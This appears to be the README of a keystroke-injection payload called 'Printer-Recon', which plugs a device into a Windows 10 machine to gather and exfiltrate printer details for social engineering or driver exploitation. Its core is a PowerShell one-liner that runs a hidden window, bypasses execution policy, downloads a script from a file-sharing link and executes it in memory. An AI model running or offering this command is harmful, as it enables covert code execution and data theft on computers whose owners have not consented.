Table of Contents
- Description
- Getting Started
- Contributing
- Version History
- Contact
- Acknowledgments
# Printer-Recon
## Description
This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10
(back to top)
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
(back to top)
## Contributing
All contributors names will be listed here
atomiczsec
I am Jakoby
(back to top)
## Version History
* 0.1
* Initial Release
(back to top)
## Contact
📱 My Socials 📱
YouTube
|
Twitter
|
I-Am-Jakoby's Discord
|
(back to top)
(back to top)
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
(back to top)